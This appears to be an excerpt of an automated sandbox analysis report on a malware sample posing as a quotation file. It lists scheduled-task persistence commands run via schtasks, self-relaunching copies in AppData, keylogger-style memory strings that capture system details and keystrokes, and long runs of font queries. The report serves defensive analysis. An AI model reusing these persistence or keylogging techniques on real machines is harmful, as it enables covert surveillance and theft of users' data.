                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp"
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp4705.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp6606.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q3<b>[ Program Manager]</b> (27/09/2024 22:02:17)<br>
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <html>Time: 10/15/2024 03:01:59<br>User Name: user<br>Computer Name: 849224<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.33<br><hr><b>[ Program Manager]</b> (27/09/2024 22:02:17)<br>{Win}r</html>
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q8<b>[ Program Manager]</b> (27/09/2024 22:02:17)<br>{Win}THcq
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q9<b>[ Program Manager]</b> (27/09/2024 22:02:17)<br>{Win}rTHcq
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Users\user\Desktop\rQuotation3200025006.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
